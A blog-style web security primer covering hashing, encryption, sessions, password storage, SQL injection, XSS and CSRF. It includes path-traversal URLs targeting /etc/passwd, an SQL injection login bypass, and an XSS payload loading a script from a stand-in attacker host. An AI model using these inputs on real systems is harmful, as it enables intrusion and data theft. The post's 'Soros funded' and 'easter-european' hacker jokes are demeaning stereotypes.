Web Security Basics
The security of websites was always an important topic, and in my opinion it’s still a bit neglected by some developers. We have plenty of new tools, browsers try to protect their users more and more, but still, it’s important for a developer to be clear with some basic concepts.
Basics⌗
Hash⌗
Hashing algorithms are basically one way functions, where (typically) the hash(x)
call is quick and easy, but its inverse is very slow and expensive - even impossible. In most cases they map arbitrary strings to fixed length, ones with very low probability of collision.
Hashes are used for example for storing passwords or for the verification of file/message integrity.
Encryption⌗
Two main types: symmetric and asymmetric (public-key) schemes.
Symmetric-key encryption⌗
- quick/easy
- encryption/decryption keys are the same
- both party need to know the secret (the encryption key) - this is the hard part
ECB
mode - electronic codebook- all blocks are simply encrypted with the key
- attacker can analyze the encrypted data to retrieve the key
CBC
mode - cipher block chaining- to increase entropy, blocks are XORed with the previous cipher text block before being encrypted
- usually an initialization vector (IV, nonce) is used to scramble the first block
- much safer than
EBC
- examples:
DES
,3DES
,AES
,IDEA
, …
Asymmetric (public-key) encryption⌗
- more expensive/slow
- key-pairs: public + private keys
- everyone has access to the public key
- key exchange is easy (if you trust the source of the public key - MITM)
- can be used to sign content (authentication, integrity, can’t be denied)
- can be used to safely distribute symmetric keys (i.e. Diffie-Hellmann key exchange for TLS/SSL)
- examples:
RSA
,DSA
, various curve based algorithms (ECDSA
,EDDSA
), …
User data handling⌗
Cookies⌗
- only for the same domain
- easy to use, stored in the browser
- cannot be trusted entirely, client can modify the data
HttpOnly
: cannot be read/modified by JS (in a standard browser)Secure
: sent back only over secure channel (HTTPS)
Sessions⌗
- stored on the server side
- the client has only the session id
- if an attacker knows your session id, he might be able to use your session
- session id in URLs
- very rarely used recently, but was common in the past
- easy to steal (especially over HTTP)
- session id in cookies
- most common way
- cookies can be more secure:
HttpOnly
Secure
- they expire
- CORS
- you can provide extra protection by binding the session to any other client specific data (like IP address, that an attacker cannot change easily)
Signed cookies⌗
- data is stored in cookies, BUT it is digitally signed by the server
- can be trusted, client cannot modify the data w/o signature corruption
JWT (JSON Web Token)⌗
- basically standardized version of signed cookies (using custom header instead of cookies)
- lot of libraries
- easy SSO (no cookie limitations, can be cross domain)
- use with care, via well tested libraries
- (even most libraries had flaws in the past, if you’d try to implement it yourself, you probably will fail somewhere)
Storing passwords⌗
As plain text⌗
- so, it will be easy to send password reminder emails
- DO NOT EVER
- also, do not send the password in email to the newly registered user…
As simple hash⌗
- still no
- rainbow tables - pre-generated searchable list of hashes
Salted hash⌗
- much better, especially with per-password salts
Generating a rainbow table for a specific salt+algorithm pair (using GPUs for example) can be pretty quick, so you might want to use slow hash algorithms.
Password summary⌗
- use random generated salts for each password
- use slow hash algorithms (like Argon2 or Bcrypt)
- store the hash algorithm as well, it can be upgraded later if a security flaw is discovered for the current one
Example from Linux:
$algid$veryrandomsalt$hashedpassword
Example:
#md5
> crypt.crypt('nem igazi jelszo', '$1$saltsalt')
'$1$saltsalt$vQbMk4l2lRc5Nr/elLy970'
#sha-256
> crypt.crypt('nem igazi jelszo', '$5$saltsalt')
'$5$saltsalt$YgzPiIYuBL6dqAnD1icVdvGnZRxKjm3nb.akiwHaPb3'
#sha-512
> crypt.crypt('nem igazi jelszo', '$6$saltsalt')
'$6$saltsalt$5Svv7/14kYtcAMAjbHEQ/J8H.X9RyKNEh8XD2/ppt9MYH57eXgeWQ.o0RJfoovtzlJT1kVEcIDaUKyd8yL6jp1'
File inclusion⌗
Sometimes you have to include files into your application based on data coming from the internet.
NEVER TRUST ANY DATA COMING FROM THE INTERNET.
Best solution: do not do such thing.
Long time ago in a galaxy far, far away, there was an ecommerce site, where the old weblogic server did not support the SVG content-type. So they created a “page” called
svg.jsp
that read the file provided in the URL parameters and served it with the proper SVG content-type.Then I sent them the following URL:
https://unknownsite.com/svg.jsp?file=../../../../etc/passwd
. So they fixed it to sevre only files under theWEB-INF
folder.Then I sent them the following URL:
https://unknownsite.com/svg.jsp?file=../../web.xml
. So they fixed it to accept the file parameter only if it ends with.svg
.Then I sent them the following URL:
https://unknownsite.com/svg.jsp?file=../../web.xml%00.svg
. And asked them to move the svg files under a static webserver, that can set the content-type properly, and delete thatsvg.jsp
for good. That solved the issue.
If you really need to do something like this, unescape/urldecode properly (using a well tested library/framework), resolve the absolute path and restrict access to a specific directory, and be really careful.
… and DO NOT EVER INCLUDE EXECUTABLE CODE IN THIS WAY!
Used to be a general solution among PHP developers in the early days, and PHP even let you import files from the internet that time… it was a nightmare (or heaven on Earth - depends who you ask).
Sql injection⌗
Imagine the following code that checks the credentials of a user:
user = SQL("select * from users where email='" + email_from_user_input + "' and password='" + hashed_password_from_user_input + "';");
Regular user input:
{
"email": "alma@beka.com",
"password": "cicaMICA"
}
-> 🎉
Soros funded evil hacker who wants to spread anarchy:
{
"email": "' or user_id=1; --",
"password": "idontcare"
}
-> 😢 (he’s probably the admin user now that has the first id) XKCD
Use ORM or at least prepared statements. Do not try to manually escape the data coming from untrusted sources, you’ll fail eventually.
But anyway, NEVER TRUST USER INPUT!
XSS - Cross Site Scripting⌗
Scenario: Search page, current search term is shown at the top of the page.
Regular user:
- Searches for
apple
- Apples are shown (among iPhones and Macs)
Malevolent easter-european from the dark side of the internet:
- Searches for
apple<script src="//h4x0rz.org/evilhackerscripttostealuserdata.js"></script>
- Apples are shown
- Copies the direct link to this page and posts it to a public forum like: “Look they even have iPhones among the apples, lol.”
- Victim clicks on the link, buys an apple using online payment, and a few minutes later buys an iPhone for someone in Poland.
General rules:
- DO NOT TRUST ANY USER INPUT, OR ANYTHING COMING FROM UNTRUSTED SOURCES!
- untrusted source: basically anything, that is not written by you. Well, do not even trust that…
- escape everything, using well tested libraries:
- HTML escape/sanitize, carefully escape HTML attributes or CSS rules
- Check OWASP
CSP - Content Security Policy⌗
CSP helps preventing XSS attacks, tells the browser the valid sources of different content types. For example you can set that CSS and JS files can be included only from your domain, and those that are directly embedded into the page content should not be executed.
See MDN for details.
CSRF - Cross Site Request Forgery⌗
Malcious site sends requests to other site with the current user’s credentials.
Example:
- Press the button to see funny video!
POST
s a request to your webbank to transfer some money to the attacker… also shows a funny video, so no worries.
Solutions:
- Check the
Origin
header (if present) - might not be possible - use CSRF token (random token, updated by every request, bound to user session) that is required for state changing operations
- modern browsers block cross-origin AJAX calls by default (see CORS)
- modern browsers also use
SameSite=Lax
by default for cookies, which also helps (see Cookies)
Summary⌗
NEVER TRUST ANYTHING COMING FROM THE INTERNET